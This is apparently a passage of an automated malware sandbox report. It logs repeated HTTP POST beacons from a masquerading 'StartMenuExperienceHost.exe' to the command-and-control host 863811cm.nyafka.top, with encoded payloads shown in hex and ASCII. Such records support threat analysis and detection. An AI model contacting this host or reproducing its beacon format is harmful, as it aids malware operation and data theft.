                                                                Data Ascii: PY]_Q\]S^ZUXQSZXWPXZUPQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X)>(X?:2-'?& !/+37B;P3-9)B5!)#Y$/\*9
                                                                Oct 11, 2024 01:36:45.660772085 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:45.898121119 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AGb05nF4pBy9Mv4jzmJ29ka%2BshinONvpefN%2FmruImKE%2FNES1%2BJ2K4qCG7fQrCNmvzgigeTvIidE2Sq8tbbCFWMbtQKbKvgl50uQgM7dGUyCX%2FtkpG9zilt2XjzV9a4Kxx1Os9ciI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f350def4394-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.549888188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:46.068685055 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2580
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:46.425901890 CEST2580OUTData Raw: 55 5d 5d 54 51 5b 5d 55 5e 5a 55 58 51 55 5a 5b 57 58 58 5d 55 52 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]TQ[]U^ZUXQUZ[WXX]URQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(7?%<@+6#5;)3##0=1*8<B"1=+#Y$/\*%
                                                                Oct 11, 2024 01:36:46.510646105 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:46.962065935 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sEMBNMcw082qGK0JW8G5K8WfB8GrlHJXDzOjl41yydkMi%2F0%2F7YCdIQEGAh51b2zBrjgl5DyyasZh3URdapdSDzAowLV%2F4Ity7l3Wegj53%2BdxC94PR1TrEgvV40Q%2BJ20aZfCCngZc"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f3a6a574308-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.549896188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:47.085319042 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:47.441612959 CEST2584OUTData Raw: 50 58 58 5d 54 5e 58 5e 5e 5a 55 58 51 53 5a 5f 57 51 58 5b 55 55 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXX]T^X^^ZUXQSZ_WQX[UUQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?#<'R2.+*56+/X?9#/P$-1S='"$Y>#Y$/\*9
                                                                Oct 11, 2024 01:36:47.527617931 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:47.776041985 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jc76NSPpDxNC34QhG%2BkRsRqCUAVcErZ%2BOANMLMlFXAAJLsGYLwpbVuMSDtwfYiKavRSQWPY6EHQH0aogkZwThiBJ0EnxRSJsUOmiBvPDgCo4KUO3mIjWvrvh6Yb%2Boj26BEaoO8Ys"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f40cf8e41f9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.549902188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:47.885536909 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:48.238500118 CEST1992OUTData Raw: 50 5d 5d 55 54 58 58 57 5e 5a 55 58 51 55 5a 59 57 58 58 5e 55 5c 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]]UTXXW^ZUXQUZYWXX^U\Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<#<93V'> ?5X5/)3 $7W'==; " Y)+#Y$/\*-
                                                                Oct 11, 2024 01:36:48.331693888 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:48.605340958 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEcCAvkkXOJf4oYcZkr1RTUPQdyh5r8NJ48WRG8%2FXabNajLItcOWFge3EdrJN9UmrYpWnklFRnKRQUMy9tf5nTaFXVufJKjx8yf0AUa5Oa%2BHxkj1w4kLIUu8JQQ35psmRHGWGnSx"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f45ce363300-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 29 07 2e 10 34 10 30 01 2d 22 2f 01 29 03 00 15 3f 1f 27 59 26 1a 24 05 2d 2f 3e 0c 36 2b 09 04 3e 5a 3d 00 33 02 05 5a 28 31 2a 51 03 1b 39 13 3c 1d 27 55 28 22 31 16 3c 32 29 17 24 33 2a 1d 2a 3d 21 12 25 2e 21 05 35 0f 2c 11 29 3f 3f 54 3b 3b 2f 44 3d 3b 26 13 23 11 2a 5f 08 13 39 54 29 16 0e 1d 22 37 3a 06 35 04 3f 1f 22 2a 2a 53 3d 00 22 57 27 20 20 5d 38 0c 20 5f 20 3f 28 0d 36 2c 26 52 23 04 2c 5a 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98').40-"/)?'Y&$-/>6+>Z=3Z(1*Q9<'U("1<2)$3**=!%.!5,)??T;;/D=;&#*_9T)"7:5?"**S="W' ]8 _ ?(6,&R#,Z&8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.549903188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:47.898642063 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:48.253998995 CEST2584OUTData Raw: 50 5b 5d 5f 54 55 58 57 5e 5a 55 58 51 52 5a 59 57 51 58 5a 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]_TUXW^ZUXQRZYWQXZUPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?=+;W&.$<(^6;#< '7W0!R(;?6 Y>#Y$/\*
                                                                Oct 11, 2024 01:36:48.343837976 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:48.605298042 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYW0j7yyUnIzdklDlvbVlrMX%2FVlIWLCiVQAyB5lBNUZhxSZtmsLb3qpzvZc%2FnAmLGafI81%2FZTj7pWYzyMzNGt4rnUnf6F4DL7YUvzyEtXoR9o55MSpMg5S2LM%2Fcv%2FRveoX0p4OmS"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f45dad84234-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:48.723887920 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.549909188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:48.847482920 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:49.191605091 CEST2584OUTData Raw: 50 5e 58 5d 54 5b 58 54 5e 5a 55 58 51 5d 5a 5a 57 58 58 5b 55 52 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^X]T[XT^ZUXQ]ZZWXX[URQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_)>+</S&0<%X#;+Z+#67$S'=V=@!!)#Y$/\*
                                                                Oct 11, 2024 01:36:49.320372105 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:49.587620020 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C8Kt8Cqozp54sLb6VOojtVM6M1rJs7tV8QOzgQJ4RjUUMSjPRgmKLMba9ZX7lewbqia%2F%2BZzvKvaR3%2FPAkcOf6MfIUM4e7rpk%2FDgI4ZeCsx4oLB7qSWb8Xj4%2F3y2OFVp1zOblIHx9"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f4bec18de94-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.549910188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:48.916302919 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:49.269617081 CEST2004OUTData Raw: 55 5d 5d 59 51 5b 5d 53 5e 5a 55 58 51 57 5a 5a 57 5f 58 5b 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]YQ[]S^ZUXQWZZW_X[UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?>*'-<E+/#;#[?05T#4$=9*;(C""$=+#Y$/\*)
                                                                Oct 11, 2024 01:36:49.364214897 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:49.610862017 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEYRrOEduspfBOdiUkRgK2j4%2FZ3ukGEkgY3oBe%2BC69fRRRz%2BWT8MMfNMuHoc7u3PNr947giazdlT5YTkD7K2LYe7vkLP0021KQZ72P9PeLSv%2FNdKYs96BD6WiF53B2V1QBUVcLve"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f4c3f7542d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 3e 39 3e 55 37 07 34 04 38 0f 20 10 2b 3d 25 07 2b 57 30 02 25 34 23 5f 2c 3c 3d 1e 22 15 02 17 29 3c 2a 5e 30 3f 37 10 28 21 2a 51 03 1b 3a 06 3c 30 2c 0e 2b 0c 3a 06 29 22 31 5f 33 33 31 0b 29 2e 21 54 27 2d 26 58 22 21 38 11 3d 2c 3f 1e 3b 05 33 0a 2a 2b 3a 5b 23 11 2a 5f 08 13 39 1e 29 38 38 50 35 09 21 14 21 5b 3f 57 36 00 31 09 29 5f 3a 1d 24 0d 20 5c 3b 31 20 58 37 06 2c 09 22 12 0c 54 20 04 3f 01 27 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^>9>U748 +=%+W0%4#_,<=")<*^0?7(!*Q:<0,+:)"1_331).!T'-&X"!8=,?;3*+:[#*_9)88P5!![?W61)_:$ \;1 X7,"T ?'("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.549918188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:49.728075981 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:50.083322048 CEST2584OUTData Raw: 50 5e 5d 59 54 55 58 57 5e 5a 55 58 51 51 5a 58 57 5f 58 5f 55 56 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]YTUXW^ZUXQQZXW_X_UVQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<=,?)8'><0!]0(#-U4'83->=(/61)+#Y$/\*1
                                                                Oct 11, 2024 01:36:50.242090940 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:50.483707905 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYgUHIp1%2BBd3Dv4uGvx60xZ4gjnGTEfgrGapG0XUzKKyxAFZQeFOmAtwRY1aeYnNCVNJhc%2BQpaeAfzyOgECvnIq5OL2wUWebPN8FJGMM65DMFNFK7m8W7Ua6pVjjq5nZBTq1qDD6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f51bea28c57-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.549919188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:49.728281021 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:50.083396912 CEST2004OUTData Raw: 55 58 5d 5e 54 58 5d 55 5e 5a 55 58 51 5d 5a 5a 57 51 58 5d 55 57 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]^TX]U^ZUXQ]ZZWQX]UWQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+-$Y+:'U2.8C<,"(,( &73.1>? 1<^=;#Y$/\*
                                                                Oct 11, 2024 01:36:50.232649088 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:50.481590033 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FkxMJdZ0tRuvVOmR9X%2Fzlfyt4NHAtw4UBhbfWhz06TVM7qzWyCHcUogzCkE0bgx36xb5Lhaz7XmEK8t%2FHD8odOcPutExbQztIVB9gWZfBq4AiyF3yZXD5DpPkdY73ya6JgrV29Df"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f51abfa4339-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 29 17 22 1e 23 00 05 1f 2f 32 27 06 2a 04 2e 5f 3f 1f 38 00 24 24 20 05 2e 3f 2a 0d 36 3b 34 59 28 3f 35 01 33 2c 0e 02 28 31 2a 51 03 1b 3a 00 3c 30 27 55 2b 0c 32 07 28 31 26 05 30 1d 13 41 3e 3e 31 56 24 10 0f 05 21 57 28 11 3d 2f 23 53 2d 2b 33 0a 3d 06 0c 11 37 11 2a 5f 08 13 39 54 3d 01 24 13 20 27 08 04 35 3d 33 55 22 07 0b 0b 3e 17 22 57 27 1d 20 58 2c 54 37 07 23 2f 2b 13 21 2c 04 1f 23 3d 2b 04 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')"#/2'*._?8$$ .?*6;4Y(?53,(1*Q:<0'U+2(1&0A>>1V$!W(=/#S-+3=7*_9T=$ '5=3U">"W' X,T7#/+!,#=+&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.549920188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:49.804059029 CEST334OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:50.161370039 CEST540OUTData Raw: 50 58 5d 58 54 54 5d 56 5e 5a 55 58 51 51 5a 5b 57 50 58 5b 55 52 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]XTT]V^ZUXQQZ[WPX[URQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(+?),'><D+#;/< 67B+V'*;#"23>;#Y$/\*1
                                                                Oct 11, 2024 01:36:50.257961988 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:50.442333937 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRRNM4Vdkbb4WZ1Uv4mMbFmBEz6MmBAeJntyuan2faG5UuUpESSrW%2BWp1IQ08K2KnFfaq04X%2BlsvDaS6%2BuCrnJyp7CbeDDb%2BQTWEPlwqct48aMNeG4DvO%2BZMqM79jR8s%2FdYvhvNk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f51cfd44334-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:50.442960024 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ddn8qPGODcLu2yd5tsptkWBxsiMqNsep61
